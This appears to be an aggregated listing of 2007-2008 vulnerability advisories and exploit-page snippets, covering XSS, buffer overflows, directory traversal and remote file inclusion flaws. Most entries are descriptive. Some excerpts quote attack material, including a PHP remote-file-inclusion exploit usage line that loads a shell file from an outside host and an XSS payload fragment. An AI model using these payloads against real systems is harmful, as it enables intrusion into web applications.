CVE-2008-3028

Multiple cross-site scripting XSS vulnerabilities in the Send-A-Card srsendcard extension 2.2.2 and earlier for TYPO3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors...

CVE-2008-3028

CVE-2008-3028 affects the TYPO3 Send-A-Card extension (sr_sendcard) 2.2.2 and earlier. The vulnerability is multiple cross-site scripting (XSS) flaws that allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. The documents identify TYPO3 extension as the affected ...

WebCalendar 1.0.4 (includedir) Remote File Inclusion Vulnerability

Exploit for unknown platform in category web applications ================================================================== WebCalendar 1.0.4 includedir Remote File Inclusion Vulnerability ================================================================== WebCalendar v1.0.4 Remote F?le Include...

GreaseKit and Creammonkey allows execution of userscript functions

Overview GreaseKit and Creammonkey contains a vulnerability that can be exploited to execute functions for userscripts. GreaseKit and Creammonkey are plugins that enable user scripting to Safari and other Apple Webkit applications, and they provide APIs callable only from userscripts. GreaseKit a...

PT-2008-3409 · Xine · Xine-Lib

Name of the Vulnerable Software and Affected Versions: xine-lib versions 1.1.12 and earlier Description: The issue is a stack-based buffer overflow in the demux nsf send chunk function, located in src/demuxers/demux nsf.c. This allows remote attackers to cause a denial of service, potentially...

PT-2008-3244 · Autonomy · Worksite Web

Name of the Vulnerable Software and Affected Versions: WorkSite Web versions 8.2 before SP1 P2 Description: The issue allows remote attackers to cause a denial of service, specifically memory consumption, via a large number of SendNrlLink directives. This results in opening a separate window for...

Buffer overflow in CIFS VFS

Multiple buffer overflows in CIFS VFS in Linux kernel 2.6.23 and earlier allows remote attackers to cause a denial of service crash and possibly execute arbitrary code via long SMB responses that trigger the overflows in the SendReceive function...

DEBIAN-CVE-2007-6015

Stack-based buffer overflow in the sendmailslot function in nmbd in Samba 3.0.0 through 3.0.27a, when the "domain logons" option is enabled, allows remote attackers to execute arbitrary code via a GETDC mailslot request composed of a long GETDC string following an offset username in a SAMLOGON...

CVE-2007-6173

Cross-site scripting XSS vulnerability in c/portal/login in Liferay Enterprise Portal 4.3.1 allows remote attackers to inject arbitrary web script or HTML via the emailAddress parameter in a Send New Password action, a different vector than CVE-2007-6055. NOTE: some of these details are obtained...

liferay-xss.txt

Vendor Site: Liferay.net Version affected: Liferay Enterprise Portal 4.3.1 Demo:http://www.liferay.net/c/portal/login?tabs1=forgot-password Class: Input Validation Error Overview: Liferay fails to sufficiently sanitize user-supplied input data in "email address" text box by pressing the "Send New...

GLSA-200709-18 : Bugzilla: Multiple vulnerabilities

The remote host is affected by the vulnerability described in GLSA-200709-18 Bugzilla: Multiple vulnerabilities Masahiro Yamada found that from the 2.17.1 version, Bugzilla does not properly sanitize the content of the 'buildid' parameter when filing bugs CVE-2007-4543. The next two vulnerabiliti...

sharelor-xss.txt

Sharelor file sender Cross site scripting ========================================= POST variable : http://www.fileflasher.com:80/contact.php?action=send with line below from="alert1248191921%3B malibu.r...

Directory traversal

Directory traversal vulnerability in Motorola Timbuktu Pro before 8.6.5 for Windows allows remote attackers to create or delete arbitrary files via a .. dot dot in a Send request, probably related to the 1 Send and 2 Exchange services...

CVE-2007-4220

Directory traversal vulnerability in Motorola Timbuktu Pro before 8.6.5 for Windows allows remote attackers to create or delete arbitrary files via a .. dot dot in a Send request, probably related to the 1 Send and 2 Exchange services...

CVE-2007-4220

Directory traversal vulnerability in Motorola Timbuktu Pro before 8.6.5 for Windows allows remote attackers to create or delete arbitrary files via a .. dot dot in a Send request, probably related to the 1 Send and 2 Exchange services...

CVE-2007-4538

emailin.pl in Bugzilla 2.23.4 through 3.0.0 allows remote attackers to execute arbitrary commands via the -f From address option to the Email::Send::Sendmail function, probably involving shell metacharacters...

CVE-2007-4538

emailin.pl in Bugzilla 2.23.4 through 3.0.0 allows remote attackers to execute arbitrary commands via the -f From address option to the Email::Send::Sendmail function, probably involving shell metacharacters...

mxBB Module FAQ & RULES 2.0.0 - Remote File Inclusion

!/usr/bin/php -q -d shortopentag=on cmd: a shell command ls -la Options: -pport: specify a port other than 80 -Pip:port: specify a proxy Example: php '.$argv0.' localhost http://www.shellsite.com/shell.txt ls -la -P1.1.1.1:80 shell.txt:...

phpMyNewsletter 0.8 (beta5) - Multiple Vulnerabilities

!/usr/bin/php -q -d shortopentag=on Thanks to rgod for the php code and Marty for the Love "; if $argc Delete Config Value Rude Attack - can't do anything after 2 - Send an Email to all of the subscribers Do not alter anything Related: 1 - None 2 - OneWordTitle TextOfYourChoice Es: php ".$argv0."...

0irc-client v1345 build20060823 Denial of Service Exploit

Exploit for unknown platform in category dos / poc ========================================================= 0irc-client v1345 build20060823 Denial of Service Exploit ========================================================= / 0irc-client v1345 build 20060823 DoS Exploit By DiGitalX email protect...